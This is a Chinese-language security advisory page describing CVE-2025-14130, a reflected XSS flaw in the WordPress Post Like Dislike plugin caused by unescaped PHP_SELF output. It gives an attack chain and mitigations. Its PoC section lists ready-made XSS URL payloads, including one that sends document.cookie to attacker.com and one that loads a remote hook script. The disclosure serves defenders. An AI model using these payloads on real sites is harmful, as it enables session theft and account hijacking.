IPBUF安全漏洞报告
English
CVE-2025-14130 CVSS 6.1 中危

CVE-2025-14130 WordPress Post Like Dislike插件反射型XSS漏洞

披露日期: 2026-01-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-14130
漏洞类型
反射型XSS
CVSS评分
6.1 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Post Like Dislike WordPress插件

相关标签

反射型XSSWordPress插件Post Like DislikeCVSS 6.1中危漏洞跨站脚本无需认证PHP_SELF注入

漏洞概述

CVE-2025-14130是WordPress插件Post Like Dislike中发现的一个反射型跨站脚本(XSS)漏洞。该插件用于为WordPress文章提供点赞和踩功能。漏洞源于插件在处理用户请求时,直接将$_SERVER['PHP_SELF']变量输出而未进行充分的输入清理和输出转义。攻击者可以通过构造恶意链接,诱导用户点击,从而在受害者的浏览器中执行任意JavaScript代码。由于该漏洞无需认证即可利用,且攻击复杂度较低,因此具有较高的实际威胁性。受影响的版本为1.0及以下所有版本。

技术细节

漏洞根源在于Post Like Dislike插件的post-like-dislike.php文件第106行附近,代码直接使用$_SERVER['PHP_SELF']变量而未进行适当的安全处理。在WordPress环境中,$_SERVER['PHP_SELF']包含当前执行脚本的路径信息,攻击者可以通过在URL路径中注入恶意脚本来利用此漏洞。例如,访问形如 /wp-admin/admin.php/\"><script>alert(document.cookie)</script> 的URL时,恶意脚本会被反射到页面响应中。由于缺乏输入 sanitization 和 output escaping,攻击者注入的HTML/JavaScript代码将直接在用户浏览器中执行,可用于窃取会话cookie、劫持用户账户或进行钓鱼攻击。

攻击链分析

STEP 1
侦察阶段
攻击者识别目标网站使用的WordPress版本及是否安装Post Like Dislike插件(版本≤1.0)
STEP 2
构造恶意链接
攻击者构造包含XSS payload的恶意URL,利用$_SERVER['PHP_SELF']变量注入点,如:/wp-admin/admin.php/"><script>alert(document.cookie)</script>
STEP 3
社会工程攻击
攻击者通过钓鱼邮件、即时消息或其他方式诱导目标用户点击恶意链接
STEP 4
请求触发
受害者浏览器向目标服务器发送包含恶意payload的HTTP请求
STEP 5
漏洞利用
服务器端插件未对PHP_SELF进行输入清理和输出转义,直接将恶意脚本反射回HTTP响应
STEP 6
脚本执行
受害者浏览器解析HTML响应时执行注入的JavaScript代码,攻击者可窃取cookie、劫持会话或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2025-14130 PoC - Reflected XSS in Post Like Dislike WordPress Plugin --> <!-- Target: WordPress site with Post Like Disislike plugin <= 1.0 --> <!-- Attack Vector: Malicious URL via $_SERVER['PHP_SELF'] --> <!-- Method 1: Direct URL Injection --> <!-- http://target-wordpress-site.com/wp-admin/admin.php/"><script>alert('XSS')</script> --> <!-- Method 2: Cookie Stealing PoC --> <!-- http://target-wordpress-site.com/wp-admin/admin.php/"><script>new Image().src='http://attacker.com/steal?c='+document.cookie;</script> --> <!-- Method 3: Beef/XSS Framework Hook --> <!-- http://target-wordpress-site.com/wp-admin/admin.php/"><script src="http://attacker.com/xss-framework.js"></script> --> <!-- Exploitation Steps: 1. Attacker crafts malicious URL with XSS payload 2. Victim is tricked into clicking the link (phishing email, social engineering) 3. Browser sends request to vulnerable endpoint 4. Server reflects unsanitized PHP_SELF value in response 5. Victim's browser executes injected JavaScript 6. Attacker steals session cookies or performs actions as victim -->

影响范围

Post Like Dislike WordPress插件 ≤ 1.0

防御指南

临时缓解措施
在官方补丁发布前,可采取以下临时缓解措施:1)禁用或删除Post Like Dislike插件;2)使用WordPress安全插件(如Wordfence)添加临时防护规则;3)在服务器层面配置CSP(Content-Security-Policy)响应头限制脚本执行;4)加强对管理员用户的安全教育,避免点击可疑链接。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表